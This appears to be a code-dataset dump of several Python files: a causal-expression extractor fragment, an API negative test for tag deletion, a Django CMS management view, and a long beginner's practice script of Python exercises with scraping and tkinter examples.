self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.C:\n results = self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.D:\n results = self.getEndResult(causal.sentence.split(causal.clue))\n elif causal.pattern == Pattern.E:\n results = self.getEndResult(causal.sentence.split(\"。\"))\n return results\n\n def getClueFromSentence(self, sentence):\n analyzer = CaboChaAnalyzer()\n tree = analyzer.parse(sentence)\n for result in self.rclueList:\n if sentence.endswith(result):\n pass # TODO: E pattern\n elif str(result) in sentence:\n matcher = sentence.split(result)[1]\n return analyzer.parse(matcher)[0]\n else:\n return None\n\n def getResultExpression(self, causals):\n results = []\n results.extend([self.getResultFromCausal(causal) for causal in causals])\n return results\n\n def getClueExpression(self, sentences):\n clues = []\n clues.extend([self.getClueFromSentence(sentence) for sentence in sentences])\n return clues","sub_path":"causal/cross_bootstrap.py","file_name":"cross_bootstrap.py","file_ext":"py","file_size_in_byte":3601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"516327269","text":"# -*- coding: utf-8 -*-\n\nimport pytest\nfrom hamcrest import assert_that, equal_to_ignoring_whitespace, is_\n\nfrom hermes.tags import TagsApi\n\n\nclass TestNegativeTag(object):\n\n @pytest.mark.parametrize('tag_id', [None, 0, 100500])\n def test_delete_tag(self, logged_client, config, tag_id):\n code, result = TagsApi.delete_tag(tag_id)\n assert_that(code, is_(404),\n 'Expected that code is \"%s\", but was \"%s\".' % (404, code))\n msg = 'There was an error with your request'\n assert_that(result['message'], equal_to_ignoring_whitespace(msg),\n 'Expected that message is \"%s\", but was \"%s\".' % (\n msg, result['message']\n ))\n","sub_path":"hermes_api_tests/tests/tags/test_negative_tag_functionality.py","file_name":"test_negative_tag_functionality.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"621677860","text":"# -*- coding: utf-8 -*-\n\"\"\"\n/dms/resource/views_manage.py\n\n.. 
enthaelt den View fuer die Management-Ansicht\n Django content Management System\n\nWerner Fabian\nw.fabian@afl.hessen.de\n\nDie Programme des dms-Systems koennen frei genutzt und den spezifischen\nBeduerfnissen entsprechend angepasst werden.\n\n0.01 30.01.2008 Beginn der Arbeit\n\"\"\"\n\nfrom django.utils.translation import ugettext as _\n\nfrom dms.queries import get_site_url\n\nfrom dms.roles import require_permission\nfrom dms.roles import UserEditPerms\n#from dms.folder.views_manage import do_manage\nfrom dms.resource.utils import get_dont\n\nfrom dms_ext.extension import * # dms-Funktionen ueberschreiben\n\n# -----------------------------------------------------\ndef get_resource_actions(request, user_perms, item_container, app_name,\n has_user_folder, dont={}):\n \"\"\" von get_folderish_actions \"\"\"\n from django.template.loader import get_template\n from django.template import Context\n from dms.queries import get_base_site_url\n import string\n if not request.user.is_authenticated():\n return ''\n t = get_template('app/resource/manage_options_resource.html')\n nPos = max ( string.rfind ( request.path, '/add/' ),\n string.rfind ( request.path, '/edit/' ),\n string.rfind ( request.path, '/navigation/' ),\n string.rfind ( request.path, '/navigation_left/' ),\n string.rfind ( request.path, '/navigation_top/' ),\n string.rfind ( request.path, '/manage/' ),\n string.rfind ( request.path, '/manage_browseable/' ),\n string.rfind ( request.path, '/manage_comments/' ),\n string.rfind ( request.path, '/import/' ),\n string.rfind ( request.path, '/export/' ),\n string.rfind ( request.path, '/manage_site/' ),\n string.rfind ( request.path, '/manage_user/' ),\n string.rfind ( request.path, '/sort/' ),\n string.rfind ( request.path, '/empty_folders/' ),\n string.rfind ( request.path, '/find_items/' ),\n )\n if nPos > -1 or dont != {}:\n path = request.path[:nPos]\n show_mode = not dont.has_key('show_mode') and user_perms.perm_read\n add_mode = not dont.has_key('add_mode') and \\\n user_perms.perm_add and item_container.item.has_user_support\n edit_mode = not dont.has_key('edit_mode') and \\\n user_perms.perm_edit\n # --- Stimmen diese Rechte bei ..own..??\n manage_mode = not dont.has_key('manage_mode') and \\\n ( user_perms.perm_manage or user_perms.perm_edit_own \\\n or user_perms.perm_manage_own )\n import_mode = not dont.has_key('import_mode') and \\\n user_perms.perm_manage_folderish\n export_mode = not dont.has_key('export_mode') and \\\n user_perms.perm_manage_folderish\n browseable_mode = not dont.has_key('browseable_mode') and \\\n user_perms.perm_edit\n comment_mode = not dont.has_key('comment_mode') and \\\n item_container.item.has_comments and \\\n user_perms.perm_edit\n user_mode = not dont.has_key('user_mode') and \\\n user_perms.perm_manage_user and has_user_folder\n navigation_mode = not dont.has_key('navigation_mode') and \\\n user_perms.perm_manage_folderish\n navigation_top_mode = not dont.has_key('navigation_top_mode') and \\\n user_perms.perm_manage_site and item_container.container.id == 1\n navigation_left_mode = not dont.has_key('navigation_left_mode') and \\\n user_perms.perm_manage_site and \\\n ( item_container.container.id == 1 or item_container.item.app.name == 'dmsEduWebquestItem' \\\n or item_container.item.app.name == 'dmsProjectgroup')\n sort_mode = not dont.has_key('sort_mode') and \\\n user_perms.perm_manage\n empty_mode = not dont.has_key('empty_mode') and \\\n user_perms.perm_manage\n search_mode = not dont.has_key('search_mode') and \\\n 
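# A sketch of a more compact form of the max(string.rfind(...), ...) ladder
# above: iterate over one tuple of markers instead of listing fifteen calls.
# MARKERS and path are illustrative values, and Python 3's str.rfind replaces
# the deprecated string module used in the original.
MARKERS = ('/add/', '/edit/', '/manage/', '/sort/', '/import/', '/export/')
path = '/resource/index.html/edit/'
n_pos = max(path.rfind(m) for m in MARKERS)
print(n_pos, path[:n_pos])      # offset of the right-most marker, base path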
user_perms.perm_add\n else :\n path = request.path\n show_mode = False\n add_mode = False\n edit_mode = False\n manage_mode = True\n import_mode = False\n export_mode = False\n browseable_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_top_mode = False\n navigation_left_mode = False\n sort_mode = False\n empty_mode = False\n search_mode = False\n\n if string.find ( path, 'index.html' ) < 0 :\n path += 'index.html'\n if ( string.find(request.path, '/add/') >= 0 ):\n edit_mode = False\n import_mode = False\n export_mode = False\n browseable_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_left_mode = False\n sort_mode = False\n empty_mode = False\n search_mode = False\n elif ( string.find(request.path, '/edit/') >= 0 ) :\n edit_mode = False\n user_mode = False\n elif ( string.find(request.path, '/manage/') >= 0 ) :\n manage_mode = False\n elif ( string.find(request.path, '/manage_browseable/') >= 0 ) :\n browseable_mode = False\n elif ( string.find(request.path, '/manage_comment/') >= 0 ) :\n import_mode = False\n export_mode = False\n comment_mode = False\n user_mode = False\n navigation_mode = False\n navigation_left_mode = False\n sort_mode = False\n elif ( string.find(request.path, '/sort/') >= 0 ) :\n user_mode = False\n sort_mode = False\n elif ( string.find(request.path, '/empty_folders/') >= 0 ):\n empty_mode = False\n elif ( string.find(request.path, '/navigation/') >= 0 ) :\n user_mode = False\n navigation_mode = False\n elif ( string.find(request.path, '/navigation_top/') >= 0 ) :\n user_mode = False\n navigation_top_mode = False\n elif ( string.find(request.path, '/navigation_left/') >= 0 ) :\n user_mode = False\n navigation_left_mode = False\n add_mode = False\n browseable_mode = False\n sort_mode = False\n search_mode = False\n empty_mode = False\n import_mode = False\n export_mode = False\n c = Context( {'authenticated' : request.user.is_authenticated(),\n 'app_name' : app_name,\n 'show_mode' : show_mode,\n 'add_mode' : add_mode,\n 'edit_mode' : edit_mode,\n 'manage_mode' : manage_mode,\n 'import_mode' : import_mode,\n 'export_mode' : import_mode,\n 'browseable_mode' : browseable_mode,\n 'comment_mode' : comment_mode,\n 'navigation_mode' : navigation_mode,\n 'navigation_top_mode' : navigation_top_mode,\n 'navigation_left_mode': navigation_left_mode,\n 'sort_mode' : sort_mode,\n 'empty_mode' : empty_mode,\n 'search_mode' : search_mode,\n 'user_mode' : has_user_folder and user_mode,\n 'path' : get_site_url(item_container, 'index.html'),\n 'user_path' : get_site_url(item_container,\n 'acl_users/index.html'),\n 'user_perms' : user_perms,\n 'user_name' : request.user,\n 'base_site_url' : get_base_site_url(),\n } )\n return t.render(c).strip()\n\n# -----------------------------------------------------\n#@require_permission('perm_add')\ndef do_manage(request, item_container, user_perms, add_ons, app_name,\n my_title, my_title_own, dont={}, allow_copy=True):\n \"\"\" Pflegemodus der Ressourcenverwaltung \"\"\"\n from dms.utils_form import get_base_vars\n from dms.utils import get_site_actions\n from django.shortcuts import render_to_response\n has_user_folder = False\n vars, user_perms = get_base_vars(request, item_container, 'frame-main-manage', False,\n ignore_own_breadcrumb=True)\n for k in dont.items():\n vars[k] = ''\n v = { 'allow_copy' : allow_copy,\n 'title' : my_title,\n 'this_title' : item_container.item.title,\n #'action' : get_folderish_actions(request, user_perms, 
item_container,\n # app_name, has_user_folder, dont),\n 'action' : get_resource_actions(request, user_perms, item_container,\n app_name, has_user_folder, dont),\n 'action_site' : get_site_actions(request, user_perms, item_container),\n 'add_mode' : user_perms.perm_add,\n 'add_ons_0' : add_ons[0],\n 'add_ons_1' : add_ons[1],\n 'add_ons_2' : add_ons[2],\n 'add_ons_3' : add_ons[3],\n 'ajax_url' : get_site_url(item_container, 'index.html/ajax/'),\n 'no_top_main_navigation': True\n }\n vars.update(v)\n return render_to_response ( 'app/base_manage.html', vars )\n\n\n# -----------------------------------------------------\n@require_permission('perm_add')\ndef resource_manage(request, item_container):\n \"\"\" Pflegemodus der Ressourcenverwaltung \"\"\"\n\n user_perms = UserEditPerms(request.user.username, request.path)\n add_ons = {}\n #add_ons[0] = [ { 'url' : get_site_url(item_container, 'index.html/add/faqitem/'),\n # 'info': _(u'Beitrag zur FAQ-Liste')}, ]\n #add_ons[1] = [ { 'url' : get_site_url(item_container, 'index.html/add/faqboard/'),\n # 'info': _(u'FAQ-Liste')}, ]\n #add_ons[2] = [ { 'url' : get_site_url(item_container, 'index.html/add/userfolder/'),\n # 'info': _(u'Community-Mitglieder eintragen, löschen, Rechte ändern ...')}, ]\n add_ons[0] = [{},]\n add_ons[1] = [{},]\n add_ons[2] = [{},]\n add_ons[3] = [{},]\n\n app_name = 'resource'\n my_title = _(u'Ressourcenverwaltung pflegen')\n my_title_own = ''\n\n return do_manage(request, item_container, user_perms, add_ons, app_name, my_title, \n my_title_own, get_dont())\n","sub_path":"resource/views_manage.py","file_name":"views_manage.py","file_ext":"py","file_size_in_byte":10448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459631140","text":"jerseyNumber = [1,3,6,7,11,9]\n\nprint('Here are the numbers that are still available:')\n\nfor i in range(0,21):\n if i in jerseyNumber:\n continue\n else:\n print(i)\n\n########################################################################################\ndef Bitcoin_to_usd(btc):\n amount = btc * 527\n print(amount)\n\nBitcoin_to_usd(15.0)\nBitcoin_to_usd(13.0)\nBitcoin_to_usd(14.0)\n\n########################################################################################\ndef allowed_dating_age(my_age):\n girls_age = my_age/2 + 7\n return girls_age\n\nli_bo_wang_limit_age = allowed_dating_age(22)\nfather_limit_age = allowed_dating_age(50)\n\nprint('li bo wang can date girls', li_bo_wang_limit_age, 'years old')\nprint('father can date girls', father_limit_age, 'years old')\n\n########################################################################################\ndef sex_gender(sex='Unknow'):\n if sex is 'm':\n sex = 'Male'\n elif sex is 'f':\n sex = 'Famale'\n print(sex)\n\nsex_gender('f')\nsex_gender('m')\nsex_gender()\n\ndef dumb_sentence(name='LI', action='is', item='awasome'):\n print(name, action, item)\n\ndumb_sentence()\ndumb_sentence('BO', 'd')\ndumb_sentence('B', 'T', 'W')\ndumb_sentence(name='NI')\n\n########################################################################################\ndef add_number(*args):\n sum = 0\n for i in args:\n sum += i\n print(sum)\n\nadd_number(2)\nadd_number(1, 2, 5, 5, 8)\nadd_number(12, 55, 7777, 7777777, 329324)\n\n########################################################################################\ndef health_caculator(age, apples_ate, cigs_smoked):\n answer = (100 - age) + (apples_ate * 3.5) - (cigs_smoked * 2)\n print(answer)\n\nli_data = [21, 0, 0]\nhealth_caculator(li_data[0], 
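# A compact sketch of the * unpacking demonstrated nearby
# (health_caculator(*bo_data)): f(*seq) spreads a sequence over positional
# parameters, and f(**mapping) does the same for keyword arguments.
# The health() function here is illustrative.
def health(age, apples, cigs):
    return (100 - age) + apples * 3.5 - cigs * 2

data = [21, 1, 1]
print(health(*data))                                    # same as health(21, 1, 1)
print(health(**{'age': 21, 'apples': 1, 'cigs': 1}))    # keyword unpacking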
li_data[1], li_data[2])\n\nbo_data = [21, 1, 1]\nhealth_caculator(* bo_data) # '*' = unpacked list bo_data\n\ngroceries = {'cereal', 'milk', 'starcrunch', 'beer', 'duct tape', 'lotion', 'beer'}\nprint(groceries)\n\nif 'milk' in groceries:\n print('You already have milk hoss')\nelse:\n print('You don\\'t have milk')\n\n\nclassmates = {'yi':'1', 'er':'2', 'san':'3'}\nprint(classmates['er'])\nfor k,v in classmates.items():\n print(k + ' ' + v)\n\n########################################################################################\nimport random\nimport urllib.request\n\ndef download_web_image(url):\n full_name = str(random.randrange(0, 1000)) + '.jpg'\n urllib.request.urlretrieve(url, full_name)\n\ndownload_web_image('https://i0.hdslb.com/bfs/archive/b70f6101851d1edd949164f6c1450a0d5d30fc00.jpg')\n\n\nli = open('iam.txt', 'w')\nli.write('cheer up!\\n')\nli.write('Thanks.\\n')\nli.close()\n\nbo = open('iam.txt', 'r')\ntext = bo.read()\nprint(text)\nbo.close()\n\n########################################################################################\nfrom urllib import request\n\ngoogle_url = 'http://pdf.dfcfw.com/pdf/H2_AN201806261159378699_1.pdf' #url\ndef download_stock_data(csv_url):\n response = request.urlopen(csv_url) #open url\n csv = response.read() #read items\n csv_str = str(csv) #str\n #new file and put items into new file and close file\n lines = csv_str.split('\\\\n')\n dest_url = r'google.csv'\n fx = open(dest_url, 'w')\n for line in lines:\n fx.write(line + '\\n')\n fx.close()\n\ndownload_stock_data(google_url)\n\n########################################################################################\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef trade_spider(max_pages):\n page = 2\n while page < max_pages:\n url = 'http://6666av.vip/list/1-' + str(page) + '.html'\n source_code = requests.get(url)\n plain_text = source_code.text\n soup = BeautifulSoup(plain_text, 'lxml')\n for link in soup.findAll('a', {'target' : '_blank'}):\n href = 'http://6666av.vip' + link.get('href')\n print(href)\n page += 1\n\n\ntrade_spider(3)\n\n########################################################################################\nwhile True:\n try:\n number = int(input('number:\\n'))\n print(18/number)\n break\n except ValueError:\n print('ValueError.')\n except SyntaxError:\n print('SyntaxError.')\n except ZeroDivisionError:\n print('ZeroDibisionError.')\n finally:\n print('Over.')\n\n########################################################################################\nclass Enemy:\n life = 3\n\n def attack(self):\n print('ouch!')\n self.life -= 1\n\n def check_life(self):\n if self.life <= 0:\n print('You are died!')\n else:\n print('player ' + str(self.life) + 'life left.')\n\n\nenemy1 = Enemy()\nenemy2 = Enemy()\n\nenemy1.attack()\nenemy1.attack()\nenemy1.check_life()\nenemy2.check_life()\n\n########################################################################################\nclass Enemy:\n def __init__(self, x):\n self.energy = x\n\n def get_energy(self):\n print(self.energy)\n\n\njason = Enemy(13)\njason.get_energy()\n\n########################################################################################\nclass Parent():\n\n def print_first_name(self):\n print('Roberts')\n\nclass Child(Parent):\n\n def print_last_name(self):\n print('SHIFT')\n pass\n\nbucky = Child()\nbucky.print_first_name()\nbucky.print_last_name()\n\n########################################################################################\nimport threading\n\nclass 
BuckysMessenger(threading.Thread):\n def run(self):\n for _ in range(100): #不需要数字,只需要随便循环十次\n print(threading.currentThread().getName())\n\n\nx = BuckysMessenger(name = 'send out messenger')\ny = BuckysMessenger(name = 'receive messenger')\nx.start()\ny.start()\n\n########################################################################################\nimport requests\nfrom bs4 import BeautifulSoup\nimport operator\n\n\ndef start(url):\n word_list = []\n source_code = requests.get(url).text\n soup = BeautifulSoup(source_code, 'lxml')\n for post_text in soup.findAll('p', {'class':'t'}):\n content = post_text.string\n words = content.lower().split()\n for each_word in words:\n word_list.append(each_word)\n clean_up_list(word_list)\n\ndef clean_up_list(word_list):\n clean_word_list = []\n for word in word_list:\n symbols = '~!@#$%^&*():\"<>?/}{][=-'\n for i in range(0, len(symbols)):\n word = word.replace(symbols[i], '')\n if len(word) > 0:\n clean_word_list.append(word)\n create_dictionary(clean_word_list)\n\ndef create_dictionary(clean_word_list):\n word_count = {}\n for word in clean_word_list:\n if word in word_count:\n word_count[word] += 1\n else:\n word_count[word] = 1\n for key, value in sorted(word_count.items(), key = operator.itemgetter(1)): #0:sort by key , 1:sort by value\n print(key, value)\n\n\nstart('https://www.bilibili.com/')\n\n########################################################################################\ndef drop_first_last(grades):\n first, *middle, last = grades\n avg = sum(middle) / len(middle)\n print(avg)\n\ndrop_first_last([12,43,56,78,999999])\n\n########################################################################################\nfirst = ['LI', 'LU']\nlast = ['BO', 'HAI']\n\nnames = zip(first, last)\n\nfor a, b in names:\n print(a, b)\n\n########################################################################################\nanswer = lambda x: x*7\nprint(answer(5))\n\n########################################################################################\nstocks = {\n 'GOOG':520.24,\n 'FB':76.45,\n 'YOOH':39.28,\n 'AMZN':306.21,\n 'AAPL':99.76\n}\n\nprint(min(zip(stocks.values(), stocks.keys())))\nprint(sorted(zip(stocks.values(), stocks.keys())))\n\n########################################################################################\nfrom struct import *\n\n#Store as bytes data\npacked_data = pack('iif', 6, 19, 4.73) #int int float\nprint(packed_data)\n\nprint(calcsize('i'))\nprint(calcsize('f'))\nprint(calcsize('iif'))\n\n#To get bytes data back to normal\noriginal_data = unpack('iif', packed_data)\nprint(original_data)\n\n########################################################################################\nincome = [10, 30, 75]\n\ndef double_money(dollars):\n return dollars*2\n\nnew_income = list(map(double_money, income)) #function, list map:take a loop == for item in income:\nprint(new_income)\n\n\n\n########################################################################################\n#-------------------- Binary AND ----------------------#\na = 50 #110010\nb = 25 #011001\nc = a & b #010000 c == 16\nprint(c)\n\n#-------------------- Binary RIGHT SHIFT ----------------------#\n\nx = 240 #11110000\ny = x >> 2 #00111100 y == 60\nprint(y)\n\n########################################################################################\nimport heapq\n\ngrades = [32, 43, 56, 765, 32, 89, 225]\nprint(heapq.nlargest(3, grades))\n\nstocks = [\n {'thicker':'GOOG', 'price':30.24},\n {'thicker':'FB', 'price':76.45},\n {'thicker':'YOOH', 
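# A self-contained sketch of what the manual word_count loop plus
# sorted(word_count.items(), key=operator.itemgetter(1)) above computes:
# collections.Counter does the counting and the ranking in one step.
# The inline text stands in for the crawled page.
from collections import Counter

words = "the quick the lazy the dog".split()
counts = Counter(words)          # replaces the if/else counting loop
print(counts.most_common(2))     # [('the', 3), ('quick', 1)]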
'price':39.28},\n {'thicker':'AMZN', 'price':306.21},\n {'thicker':'AAPL', 'price':99.76},\n]\n\nprint(heapq.nsmallest(2, stocks, key = lambda stock: stock['price']))\n\n########################################################################################\nfrom collections import Counter\n\ntext = 'Could someone clarify why \"we\"'\\\n 'which also occurred thrice was '\\\n 'not printed along with \"in\", was '\\\n 'it also sorted based on alphabetical preference?'\\\n 'Sorry if this was silly am just a beginner.'\nwords = text.split()\n\ncounter = Counter(words)\ntop_three = counter.most_common(3)\nprint(top_three)\n\n########################################################################################\nfrom operator import itemgetter\n\nstocks = [\n {'thicker':'GOOG', 'price':30.24},\n {'thicker':'FB', 'price':76.45},\n {'thicker':'YOOH', 'price':39.28},\n {'thicker':'AMZN', 'price':306.21},\n {'thicker':'AAPL', 'price':99.76},\n]\n\nfor x in sorted(stocks, key = itemgetter('thicker', 'price')):\n print(x)\n\n########################################################################################\nfrom operator import attrgetter\n\nclass User:\n\n def __init__(self, x, y):\n self.name = x\n self.user_id = y\n\n def __repr__(self):\n return self.name + ':' + str(self.user_id)\n\n\nusers = [\n User('Bucky', 43),\n User('Sally', 5),\n User('Tuna', 61),\n User('Brian', 2),\n User('Joby', 77),\n User('Amanda', 9),\n\n]\n\nfor user in users:\n print(user)\n\nprint('------')\nfor user in sorted(users, key = attrgetter('name')):\n print(user)\n\nprint('------')\nfor user in sorted(users, key=attrgetter('user_id')):\n print(user)\n\n\n########################################################################################\nimport re\n\nm = re.findall('abc', 'aaaaabcaabcc')\nprint(m)\n\nm = re.findall('\\d', 'snkand21d12f2f')\nprint(m)\n\nm = re.findall('\\d\\d\\d\\d', '1234dowjdo4213iojofijo23lj')\nprint(m)\n\n# .:匹配任意字符; *:匹配无限个\n\nm = re.findall(r'(.*)', 'hello')\nprint(m)\n\nm = re.findall(r'(.*)', 'helloworld')\nprint(m)\n\n# ?:非贪婪模式\n\nm = re.findall(r'(.*?)', 'helloworld')\nprint(m)\n\n\n########################################################################################\nclass Stack(object):\n def __init__(self):\n self.data_stack = []\n\n def init_stack(self):\n self.data_stack = []\n\n def insert(self, data):\n self.data_stack.append(data)\n\n def pop(self):\n if len(self.data_stack) == 0:\n return None\n data = self.data_stack[-1]\n del self.data_stack[-1]\n return data\n\n def size(self):\n return len(self.data_stack)\n\n\nstack = Stack()\nstack.insert(1)\nstack.insert(2)\nstack.insert(3)\nprint(stack.size())\nprint(stack.pop())\nprint(stack.pop())\nprint(stack.pop())\nprint(stack.pop())\n\n\n########################################################################################\ndef find_list(list1, goal):\n left = 0\n right = len(list1) - 1\n while left <= right:\n mid = int((left + right)/2)\n if list1[mid] < goal:\n left = mid + 1\n continue\n if list1[mid] == goal:\n return mid\n if list1[mid] > goal:\n right = mid - 1\n continue\n return None\n\nsearch_list = [1, 3, 4, 6, 8, 9]\nprint(find_list(search_list, 1))\nprint(find_list(search_list, 3))\nprint(find_list(search_list, 5))\nprint(find_list(search_list, 6))\nprint(find_list(search_list, 7))\nprint(find_list(search_list, 9))\n\n########################################################################################\ndef insert_sort(original_list):\n sorted_list = []\n for i in range(0, len(original_list)):\n if 
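# A sketch of the stdlib equivalent of the hand-rolled binary search above:
# bisect_left finds the leftmost insertion point, and a bounds-plus-equality
# check turns it into the same index-or-None contract as find_list.
import bisect

def bisect_find(sorted_list, goal):
    i = bisect.bisect_left(sorted_list, goal)
    return i if i < len(sorted_list) and sorted_list[i] == goal else None

print(bisect_find([1, 3, 4, 6, 8, 9], 6))   # 3
print(bisect_find([1, 3, 4, 6, 8, 9], 5))   # None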
len(sorted_list) == 0:\n sorted_list.append(original_list[i])\n continue\n for j in range(len(sorted_list)-1, -1, -1):\n if sorted_list[j] <= original_list[i]:\n sorted_list.insert(j+1, original_list[i])\n break\n if j == 0:\n sorted_list.insert(0, original_list[i])\n return sorted_list\n #original_list[:] = sorted_list[:]\n\nlist1 = [2,3,5,6,7,4,32,4,2,1,1,0]\nprint(insert_sort(list1))\n\n\ndef bubble_sort(original_list):\n for i in range(len(original_list), 0, -1):\n for j in range(0, i-1):\n if original_list[j] > original_list[j+1]:\n original_list[j], original_list[j+1] = original_list[j+1], original_list[j]\n\n\nlist1 = [2,3,5,6,7,4,32,4,2,1,1,0]\nprint(insert_sort(list1))\n\n########################################################################################\ndef bubble_sort(original_list):\n for i in range(len(original_list), 0, -1):\n for j in range(0, i-1):\n if original_list[j] >= original_list[j+1]:\n original_list[j], original_list[j+1] = original_list[j+1], original_list[j]\n\n########################################################################################\nimport tkinter as tk\nfrom tkinter import messagebox\nimport requests\n\ndef translate():\n content = Entry1.get()\n if content == '':\n messagebox.showinfo('提示', '输入不能为空')\n else:\n url = 'http://fanyi.youdao.com/translate?smartresult=dict&smartresult=rule'\n header = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) '\n 'AppleWebKit/537.36 (KHTML, like Gecko) '\n 'Chrome/67.0.3396.99 Safari/537.36'}\n\n data = {}\n data['i'] = content\n data['from'] = 'AUTO'\n data['to'] = 'AUTO'\n data['smartresult'] = 'dict'\n data['client'] = 'fanyideskweb'\n #data['salt'] = ''\n #data['sign'] = ''\n data['doctype'] = 'json'\n data['version'] = '2.1'\n data['keyfrom'] = 'fanyi.web'\n data['action'] = 'FY_BY_CLICKBUTTION'\n data['typoResult'] = 'false'\n\n result = requests.post(url, data=data, headers=header)\n trans_result = result.json()\n trans_result = trans_result['translateResult'][0][0]['tgt']\n res.set(trans_result)\n\n\nmy_translate = tk.Tk()\nmy_translate.title('翻译')\nmy_translate.geometry('450x110+1080+440')\nres = tk.StringVar()\n\nLabel1 = tk.Label(my_translate, text='输入要翻译的文字', font=('经典细圆简', 18), fg='cyan')\nLabel2 = tk.Label(my_translate, text='翻译后的文字', font=('华文行楷', 20))\nLabel1.grid()\nLabel2.grid()\n\nEntry1 = tk.Entry(my_translate, font=('微软雅黑', 15))\nEntry2 = tk.Entry(my_translate, font=('微软雅黑', 15), textvariable=res)\nEntry1.grid(row=0, column=1)\nEntry2.grid(row=1, column=1)\n\nButton1 = tk.Button(my_translate, text='翻译', width=6, font=('微软雅黑', 16), fg='#321663', command=translate)\nButton2 = tk.Button(my_translate, text='退出', width=6, font=('微软雅黑', 14), fg='#321663', command=my_translate.quit)\nButton1.grid(stick='W')\nButton2.grid(row=2, column=1, stick='e')\n\nmy_translate.mainloop()\n\n########################################################################################\ndef medx():\n for x in range(1, 10):\n for y in range(1, x+1):\n print('%d*%d=%d ' % (y, x, x*y), end='\\t')\n print('')\n\n\n row = 1\n while row<=9:\n col = 1\n while col<=row:\n print('%d*%d=%d ' % (col, row, row*col), end='\\t')\n col += 1\n print('')\n row += 1\n\nimport re\nimport requests\nprint('xxx')\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)
', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n########################################################################################\nimport re\nimport requests\nprint('xxx')\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n\nimport re\nimport requests\nprint('xxx')\n#re.match/re.search\ncontent = requests.get('https://book.douban.com/').text\npattern = re.compile('(.*?)', re.S)\nresults = re.findall(pattern, content)\n\n\n\nfor result in results:\n url, name = result\n #name = re.sub('\\s','',name)\n print(url, name.strip())\n\n########################################################################################\nimport tkinter as tk\n\nwindow = tk.Tk()\nwindow.title('my_window')\nwindow.geometry('400x400+500+1400')\n\nv1 = tk.StringVar()\nv2 = tk.StringVar()\nv3 = tk.StringVar()\n\non_hit = False\ndef hit_me():\n global on_hit\n if on_hit == False:\n v1.set('outch!')\n on_hit = True\n else:\n v1.set('')\n on_hit = False\n\ndef insert_button():\n v2 = e1.get()\n t1.insert('insert', v2)\n\ndef end_button():\n v3 = e1.get()\n t1.insert(.2, v3)\n\n\ne1 = tk.Entry(window, show=None, bg='#d28990', font=('Arial', 14), width=25)\ne1.pack()\n\n#l1 = tk.Label(window, textvariable=by_hit, bg='cyan', font=('Arial', 14), width=25, height=3)\n\n\n\nb1 = tk.Button(window, command=insert_button, text='insert point', bg='#273784', font=('微软雅黑', 14), width=20, height=3)\nb2 = tk.Button(window, command=end_button, text='insert end', bg='#773784', font=('微软雅黑', 14), width=20, height=3)\nb1.pack()\nb2.pack()\n\nt1 = tk.Text(window, height=3, bg='white' )\nt1.pack()\n\nwindow.mainloop()\n\n########################################################################################\nv4 = tk.StringVar()\nv4.set([11, 22, 33, 44])\n\nlb1 = tk.Listbox(window, listvariable=v2)\nlb1.pack()\n\nlist_item = [1, 2, 3, 4]\nfor item in list_item:\n lb1.insert('end', item)\n\nlb1.insert(0, 'xx', 'yy')\nlb1.delete(2)\nlb1.insert('end', 't')\n\n########################################################################################\nv1 = tk.StringVar()\n\ndef print_selection():\n l1.config(text='you have selected '+v1.get())\n\nl1 = tk.Label(window, text='', bg='cyan', font=('Arial', 14), width=25, height=3)\nl1.pack()\n\nr1 = tk.Radiobutton(window, text='Option A', variable=v1, value='A', command=print_selection, bg='green')\n\n########################################################################################\ndef press_selection(v):\n l1.config(text='to: '+v)\n\nl1 = tk.Label(window, text='', bg='cyan', font=('Arial', 14), width=25, height=3)\nl1.pack()\n\ns = tk.Scale(window, label='my name is try me', from_=5, to=15,\n orient=tk.HORIZONTAL, length=200, showvalue=0, tickinterval=2,\n resolution=0.001, command=press_selection)\ns.pack()\n\n########################################################################################\nv1 = tk.IntVar()\nv2 = tk.IntVar()\n\ndef press_selection():\n if (v1.get()==1) and (v2.get()==0):\n l1.config(text='just Python')\n elif (v1.get() == 0) and (v2.get() == 0):\n l1.config(text='Neither')\n elif (v1.get() == 0) and (v2.get() == 1):\n l1.config(text='C+ ')\n else:\n l1.config(text='Both ')\n\n\nl1 = tk.Label(window, text='please select', bg='cyan', font=('Arial', 14), 
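# A minimal self-contained version of the Checkbutton pattern in this
# section: one IntVar per box and a single command callback that reads both.
# Widget texts and layout are illustrative.
import tkinter as tk

root = tk.Tk()
v_py, v_c = tk.IntVar(), tk.IntVar()
label = tk.Label(root, text='please select')
label.pack()

def on_change():
    picked = [name for name, v in (('Python', v_py), ('C', v_c)) if v.get()]
    label.config(text=' and '.join(picked) or 'Neither')

tk.Checkbutton(root, text='Python', variable=v_py, command=on_change).pack()
tk.Checkbutton(root, text='C', variable=v_c, command=on_change).pack()
root.mainloop()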
